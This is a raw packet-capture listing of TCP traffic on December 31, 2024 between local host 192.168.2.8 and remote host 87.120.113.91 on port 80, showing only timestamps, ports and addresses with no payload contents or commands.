                                                        Dec 31, 2024 09:28:25.303235054 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303342104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303359032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303370953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303391933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303473949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303486109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303495884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303519011 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303540945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303611040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303622007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303633928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303644896 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303656101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303667068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303674936 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303692102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303699970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303867102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303879023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303890944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303900957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303910017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303919077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303945065 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303971052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308044910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308088064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308098078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308135033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308166027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308177948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308208942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308237076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308248997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308274031 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308315992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308363914 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308433056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308449984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308466911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308478117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308490038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308495998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308507919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308515072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308526039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308541059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308680058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308691025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308702946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308716059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308722019 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308737040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308840036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308852911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308864117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308871031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308892012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308947086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.308967113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.308978081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309015036 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309060097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309072018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309083939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309098005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309103966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309115887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309134007 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309148073 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309302092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309313059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309324980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309350014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309456110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309467077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309477091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309488058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309495926 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309505939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309514046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309523106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309533119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309547901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309554100 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309564114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309576988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309583902 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309593916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.309612036 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.309627056 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.311458111 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.396928072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.396944046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.396956921 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.396975994 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.396981955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.396989107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397052050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397078991 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397129059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397140026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397151947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397178888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397238016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397250891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397263050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397277117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397300959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397341013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397408009 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397418976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397449970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397592068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397603035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397614002 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397624016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397639036 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397646904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397667885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397686005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397738934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397752047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397788048 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397869110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397881031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397891998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.397918940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.397996902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.398032904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408072948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408082962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408096075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408108950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408118010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408169031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408181906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408195972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408207893 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408220053 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408257961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408274889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408297062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408308029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408334970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408344030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408360004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408373117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408394098 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408416033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408483982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408495903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408513069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408523083 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408538103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408543110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408562899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408627033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408638954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408651114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408662081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408668995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408678055 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408699989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408730030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408763885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408776045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408787012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408797026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408806086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408816099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408833027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.408898115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408910036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.408952951 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409018993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409029007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409039974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409050941 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409066916 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409073114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409084082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409094095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409110069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409152985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409209967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409277916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409295082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409306049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409321070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409332037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409338951 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409353018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409359932 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409369946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409380913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409393072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409425974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409425974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409591913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409603119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409614086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409625053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409636974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409645081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409666061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409682035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409744024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409760952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409771919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409781933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409792900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.409805059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.409821987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.411014080 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.415925980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.415949106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.415961027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.415977001 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.415998936 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416007996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416019917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416054010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416078091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416091919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416134119 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416160107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416171074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416183949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416208982 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416270971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416280985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416291952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416302919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416311979 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416321993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416341066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416356087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416398048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416441917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416477919 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416500092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416508913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416520119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416531086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416538954 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416562080 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416709900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416719913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416738033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416753054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.416765928 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.416790962 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417309999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417345047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417356968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417397976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417459011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417478085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417490005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417499065 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417509079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417524099 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417615891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417628050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417639017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417656898 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417670965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417675972 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417774916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417785883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417797089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417809010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417818069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417841911 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.417951107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417963982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417975903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417985916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.417994976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.418006897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.418015003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.418054104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.418088913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.418097973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.418143988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.424065113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505476952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505501032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505512953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505585909 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505600929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505611897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505647898 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505677938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505717993 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505737066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505748987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505785942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505819082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505829096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505839109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505856037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505867004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.505892038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.505904913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506033897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506046057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506057978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506068945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506078005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506109953 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506196022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506206989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506236076 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506351948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506362915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506373882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506383896 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506392002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506402016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506412983 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506431103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506438971 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506448984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506499052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506614923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506625891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506635904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506647110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506659985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506666899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506675959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.506694078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.506710052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518367052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518409014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518419981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518462896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518484116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518496037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518536091 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.518583059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518594027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518610954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.518635035 CET4970880192.168.2.887.120.113.91
